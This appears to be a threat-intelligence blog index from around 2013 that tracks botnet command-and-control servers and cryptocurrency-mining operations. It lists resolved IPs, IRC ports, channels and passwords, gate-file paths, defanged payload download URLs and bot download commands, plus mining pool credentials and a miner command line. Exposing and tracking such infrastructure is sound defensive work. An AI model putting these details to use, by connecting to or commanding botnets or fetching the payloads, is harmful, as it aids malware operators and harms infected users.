Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server: x01bkr2.biz Port: 4723 Channel: #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperatelyRead more...
lxm.m94vo3.com(BitCoin Miner hosted in France Paris Gandi Sas)
Thanks to Aliss for the sample Resolved : [lxm.m94vo3.com] To [92.243.23.55]Resolved : [lxm.m94vo3.com] To [92.243.4.137] minerd.exe -a scrypt -u fukkerrrr.1 -p x -s 15 –no-longpoll -q -o lxm.m94vo3.com:8080 sample here hosting infos: http://whois.domaintools.com/92.243.23.55
rocksolidswag.no-ip.org (Betabot http botnet hosted by ecatel.net)
Resolved rocksolidswag.no-ip.org to 89.248.160.146 Server: rocksolidswag.no-ip.org Gate file: /swag/order.php Alternate domains: swazers.com pirateleaks.us lilseizurespizza.com trytoperceive.me The owner is mining some bitcoins: http://askaa_worker:penis@us3.eclipsemc.com:8337 Hosting infos: http://whois.domaintools.com/89.248.160.146
h.opennews.su (irc botnet hosted by qhoster.com)
Resolved h.opennews.su to 5.45.181.254 Server: h.opennews.su Port: 9000 Channel: #sp Channel password: yop Topic for #sp is: !wB/smZJsKbDADvo5ab8sIF/r5RP7kkXfEsreBMH+9hiVs3ilngzFHh0Ph9sbgtC/EeqYw5x0Vj2IqRyb/knFS+LUzo6bf3cW/A1SyUXkVxz8ERDPS2K/qHObIS3TFyR2JAiWdnWc82S3KnAwUHQFMEb6h/kQqB9TcZElsKS4BnyDiGp1B19crjVgBes7+ilkHVmFLRRgoSPyUBx71ioiUporVdeOIEUhA547CIbp0odHxRQ41LK9wPz13N8KYZx6/QE//rZhBqCorPJqg3w= Topic for #sp set by SNK at Thu Apr 04 06:16:09 2013 Example bot nick: n{USA-XPx86u}gjekbowg Alternate domains: f.eastmoon.pl gigasbh.org gigasphere.su o.dailyradio.su photobeat.su s.richlab.pl uranus.kei.su xixbh.com xixbh.net You may recognize some of the domains from previous postsRead more...
privategallerie.info (Andromeda http botnet hosted by vmbox.co)
Resolved privategallerie.info to 198.20.67.66 Server: privategallerie.info Gate file: /admin/hippo/image.php Bitcoin mining info: http://pr3m1era_quio:mota@eu.triplemining.com:8344 A previously posted andromeda botnet had a similar folder path to the gate file. Hosting infos: http://whois.domaintools.com/198.20.67.66
keep.hustling4life.biz (Bitcoin mining pool for botnet)
Resolved keep.hustling4life.biz to 195.190.13.138, 46.17.92.158, 213.165.85.165 Someone is trying to get some mining done before the mining reward drops I guess. The file is from an already posted botnet. * Topic for #mr is: !dl hxxp://213.165.85.165:8081/udhsdfka.png * Topic for #mr set by test at Mon Nov 26 04:52:40 2012 Server: keep.hustling4life.biz Port: 2142 Mining information:Read more...
cheatmodernwarfare.com (Multiple http bots hosted by Romania Torben Diehr)
Posting some french heckers stuff Andromeda loader Server: cheatmodernwarfare.com Gate file: /xbox/image.php Rootkit plugin: hxxp://magnatesmobileapps.com/sym/r.pack Socks plugin: hxxp://magnatesmobileapps.com/sym/s.pack Backup domains: down4life.hopto.org explosiontaracesavatoutdechirer.chickenkiller.com fckd330.mooo.com kbot Server: h4r3.hopto.org redirects to: kb.itprosolutions.org Gate file: /joomla/gate.php Server: purenet.hopto.org Redirects to: 91.234.105.14 Gate file: /kb/gate.php Server: smk.cheatgame.org Gate file: /kb/gate.php Smoke loader (Currently down) Server: smk.cheatmodernwarfare.com Gate file: /s2/control.php HostbooterRead more...
planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)
This is the http loader for the gold installs ppi program. Resolved planetstat2324.su to 178.255.43.67 Server: planetstat2324.su Gate file: /gamenew/index.php Downloads files from ap2producoes.com/images/ minsabdedf.exe bitcoin miner pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332 ginamdasm.exe The file botnet owners are given installs smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe Install statistics are then recorded by oroihfdbbnennm.in/activation.php Using the format activation.php?productid=(userid)&serial=(long string) Hosting infos:Read more...
vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)
Resolved vandersand.no-ip.biz to 199.115.230.138 Server: vandersand.no-ip.biz Port: 6654 Channel: #Insomnia Channel password: frosty * Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5 * Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012 Botnick: {IT|XP-32a}uwryxvf While I was in the channel he downloaded a bitcoin miner Dextermania.exe hxxp://versx.net/x/bcm/bitcoin-miner.exe http://pool.bitclockers.com:8332 -u Dexter -p 19930924 HostingRead more...
bb.qc.to (IRC botnets hosted by France Roubaix Ovh Systems)
Resolved bb.qc.to to 37.59.35.104 Server: bb.qc.to Port: 7356 Password: d0wn * There are 1 users and 896 invisible on 1 servers * 4 :unknown connection(s) * 41 :channels formed * I have 897 clients and 0 servers * Current Local Users: 897 Max: 1356 * Current Global Users: 897 Max: 1356 Channel: #d0wn4l1f3 Pass: downRead more...